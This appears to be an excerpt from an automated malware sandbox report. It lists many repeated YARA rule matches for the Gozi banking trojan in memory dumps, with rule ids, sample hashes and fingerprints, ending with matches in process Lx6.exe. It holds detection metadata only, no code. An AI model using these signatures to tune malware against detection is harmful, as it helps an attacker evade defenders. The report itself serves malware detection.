Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
